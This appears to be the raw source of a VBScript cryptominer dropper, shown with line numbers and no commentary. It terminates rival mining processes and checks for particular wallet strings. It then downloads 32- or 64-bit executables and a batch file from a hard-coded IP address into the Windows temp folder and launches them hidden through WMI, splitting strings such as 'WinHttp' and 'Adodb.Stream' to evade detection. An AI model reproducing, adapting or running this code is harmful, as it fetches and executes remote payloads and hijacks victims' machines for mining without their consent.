On Error Resume NextDim OSlag,OSver,numcpus,objOutParams,objWMIREGServiceSet

1. On Error Resume Next
2. Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService
3. Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\DEFAULT:StdRegProv")
4. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Nls\Language", "Default",OSlag)
5. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion",OSver)
6. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "NUMBER_OF_PROCESSORS",numcpus)
7. Set objFSO = CreateObject("Scripting.FileSystemObject")
8. windir = objFSO.GetSpecialFolder(0)
9. Dim needdl
10. needdl = 1
11.  
12. user_agent_list=array("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", _
13. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", _
14. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16", _
15. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", _
16. "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15", _
17. "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", _
18. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", _
19. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)")
20. Randomize
21. X=CInt(7*Rnd())
22.  
23. strComputer = "."
24. Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
25. Set cols=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
26. For Each objItemm in cols
27. If InStr(1,LCase(objItemm.CommandLine), LCase("-manliana")) > 0 Then objItemm.Terminate
28. If InStr(1,LCase(objItemm.ExecutablePath), LCase("smssm.exe")) > 0 Then objItemm.Terminate
29. Next
30. wscript.sleep 5000
31. Set colProcessList1=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
32. For Each objItem in colProcessList1
33. If InStr(1,objItem.CommandLine, "CGX2U2oeocN3DTJhyPG2cPg7xpRRTzNZkz") > 0 Then needdl = 0
34. If InStr(1,objItem.CommandLine, "CcTzQsSWvf1zhbMA3kf2rpYxogEMcVjmJ3") > 0 Then needdl = 0
35. If InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0 Then
36. objItem.Terminate
37. End If
38. notsyspath = not(InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\lsass.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\services.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\csrss.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\winlogon.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\smss.exe") > 0)
39. hcline = InStr(1,LCase(objItem.CommandLine), "-datadir=") > 0 Or InStr(1,LCase(objItem.CommandLine), "ypool.net") > 0 Or InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0
40. if notsyspath and hcline then
41. objProcess.Terminate
42. End If
43. Next
44.  
45. If needdl = 1 Then
46. OStype = X86orX64()
47. if OStype = "x86" Then
48. dl "http://66.186.188.227:88/32.exe","c:\windows\temp\mstdc.exe"
49. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
50. runprg "c:\windows\temp\sst.bat"
51. WScript.Quit
52. ElseIf OStype = "x64" Then
53. dl "http://66.186.188.227:88/64.exe","c:\windows\temp\mstdc.exe"
54. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
55. runprg "c:\windows\temp\sst.bat"
56. WScript.Quit
57. End If
58. End If
59. Function dl(u,f)
60. dim xHttp:Set xHttp = createobject("WinH" & "ttp.WinHt" & "tpRequ" & "est.5.1")
61. dim bStrm:Set bStrm = createobject("Ad" & "od" & "b.S" & "tre" & "am")
62. xHttp.Open "GET",u, 0
63. xHttp.SetRequestHeader "User-Agent", user_agent_list(X)
64. xHttp.Send
65. with bStrm
66. .type = 1
67. .open
68. .write xHttp.responseBody
69. .savetofile f,2
70. .close
71. end with
72. End Function
73. Function runprg(ppath)
74. Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2")
75. Set objStartup = objPS.Get("Win32_ProcessStartup")
76. Set objConfig = objStartup.SpawnInstance_()
77. objConfig.ShowWindow = 0
78. Set objShare = objPS.Get("Win32_Process")
79. Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
80. objInParam.Properties_.Item("CommandLine") = ppath
81. objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
82. Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
83. End Function
84. Function X86orX64()
85. On Error Resume Next
86. strComputer = "."
87. Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
88. Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
89. For Each objItem in colItems
90. If InStr(objItem.SystemType, "86") <> 0 Then
91. X86orX64 = "x86"
92. ElseIf InStr(objItem.SystemType, "64") <> 0 Then
93. X86orX64 = "x64"
94. Else
95. X86orX64 = objItem.SystemType
96. End If
97. Next
98. End Function
99. Function wlog(slog)
100. Set objFSO = CreateObject("Scripting.FileSystemObject")
101. windir = objFSO.GetSpecialFolder(0)
102. Set f = objFSO.CreateTextFile(windir + "\wb2010kb.log",1)
103. f.WriteLine(slog)
104. f.Close
105. Set objFSO = Nothing
106. End Function